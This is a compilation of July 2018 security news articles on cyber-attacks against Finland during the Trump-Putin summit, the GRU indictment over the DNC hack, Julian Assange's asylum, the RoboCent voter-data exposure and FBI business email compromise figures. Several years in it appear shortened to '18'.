The Finland and Singapore cyber-attacks showed some similarities in targeted ports, which included SIP port 5060, which is typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often secure devices with easily guessable credentials, which turns these products into easy targetes for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind top targeted countries. Compared to Canada, which typically makes it to top 10 but not top 5, Finland received on a small fraction of cyber-attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.


Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.18 securityaffairs  BigBrothers

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland.
Important events represent an element of attraction for cyber attacks, in June we discussed the Trump-Kim summit and the way Singapore that held it was hit by an unprecedented number of attacks from June 11 to June 12.

At the time most of the cyber attacks were originated in Russia.

Let’s analyze the effect in the cyberspace of another event, the Trump-Putin meeting that was held in Helsinki in Finland that historically is not a privileged target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again researchers at security firm F5 analyzed the number of attacks that hit the location during the summit and made an interesting discovery, most of the cyber attacks were originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Trump-Putin attacks

Experts observed many similarities between the attacks that were observed against the countries that hosted the two meeting. Hackers targeted the same ports, including included SIP port 5060 typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22 which is typically used for the secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials to compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks. ” continues F5.

Experts noticed that some ports targeted by the attacks during the Trump-Putin meeting were not hit during the Singapore summit, for example, the HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Experts highlighted that Finland is not included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%);
According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.


Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.18 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week, this means that Assange will leave the embassy and British authorities will catch him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly-elected President of Ecuador Lenín Moreno arrived in London on Friday, officially the motivation of his travel is the participation at the Global Disability Summit on 24 July 18, but media reports suggest he was reaching an agreement with UK government to withdraw the asylum protection of Assange.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 18 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

@ggreenwald
· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

@ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 18
946
590 people are talking about this
Twitter Ads info and privacy

Glenn Greenwald

@ggreenwald
· 20 Jul
Replying to @ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

Glenn Greenwald

@ggreenwald
The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 18
624
503 people are talking about this
Twitter Ads info and privacy
In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the Wikileaks founder fears that he would be extradited to the US, where he is facing federal charges his role in the Chelsea Manning‘s case.

Julian Assange

Three months ago, Ecuador blocked Assange from accessing the internet, mainly to avoid that he could express support to Catalonia and its dispute with the Spanish Government for the independence.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

Which are current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender” that is considered by experts a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.


Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.18 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 18 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the wide spread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-Centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”


Robocalling Firm Exposes U.S. Voter Records
20.7.18 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.


12 Russian Intel Officers charged of hacking into U.S. Democrats
19.7.18 securityaffairs BigBrothers

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
The special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, now charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“there’s no allegation in this indictment that any American citizen committed a crime.” said Rosenstein. “the conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, the agents used payment with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General, confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The minority at the US Government is pressing Trump to cancel the meeting with Putin because he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

Russian intelligence

The White House

@WhiteHouse
At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

10:03 PM - Jul 13, 18
8,718
5,186 people are talking about this
Twitter Ads info and privacy
Russian intelligence
Hillary Clinton and Donald Trump are tightening their grips on the Democratic and Republican presidential nominations.

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, there was at least a person close to the Trump campaign and a candidate for Congress that in contact the Russians officers.


FBI: Overall BEC/EAC losses between Oct 2013 and May 18 result in $12 billion
19.7.18 securityaffairs BigBrothers

The number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 18.
FBI provided further data related to Email Account Compromise, according to the feds, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 18.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 18.
Overall losses between October 2013 and May 18 result in $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058 resulting in $2.9 billion in losses. Feds highlighted that most of the fraudulent activities leveraged on China and Hong Kong banks as receipt of fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on the organizations in the real estate industry, from 2015 to 2017, there was an increase of 1,100% of BEC/EAC victims.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continue the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below the BEC/EAC statistics that were shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299
The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 18:
Total U.S. victims: 41,058
Total U.S. victims: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009
The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 20163. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 18:
Total U.S. financial recipients: 19,335
Total U.S. financial recipients: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278
FBI BEC
According to a report published by TrendMicro published in January 18, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 18.8.


Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.18 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported the CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts of hacking of “old emails” of the Republican National Committee was first reported by the CNN in January last year when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”


Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.18 securityaffairs BigBrothers

The Director of the National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attacker, the number of their attacks continue to increase and the level of sophistication is growing too.

US infrastructure threat

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it. On Friday, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned of threat a “crippling cyber attack on our critical infrastructure” by a nation state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported the Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He made a parallelism on the current situation in the cyberspace with the “alarming activities” that U.S. intelligence detected before al Qaeda conducted Sept. 11, 2001 attack.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency based in the St. Petersburg that was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.


Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.18 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, but as expected Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump made a joint news conference and of course, the US President Trump confirmed its trust in the words of the ally Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about alleged Russia’s interference in the 2016 Presidential election, his investigation led to the indictment of 12 Russian intelligence officials working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, this is the Trump’s though.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

Trump Putin
HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 18 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below the excerpt from the full transcript from the Helsinki press conference about alleged interference in 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.


Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.18 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company database exposed online. The expert was using the online service GrayhatWarfare that could be used to search publicly exposed Amazon Web Services data storage buckets.

The company offers for sale voter records for a price of 3¢/record, the same data that left exposed online.

Querying the system for the term “voters” he found the AWS bucket used by RoboCent.

The bucked discovered by the expert contained 2,584 files, exposed voters’ data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Gender
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education
RoboCent exposed data

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company that quickly secured the bucket, below the message sent by a developer of the company that solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online, in June 2017 DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.

In December 2017, Diachenko discovered another an exposed MongoDB database containing voter registration data for more than 19 million California residents.


Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
19.7.18 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

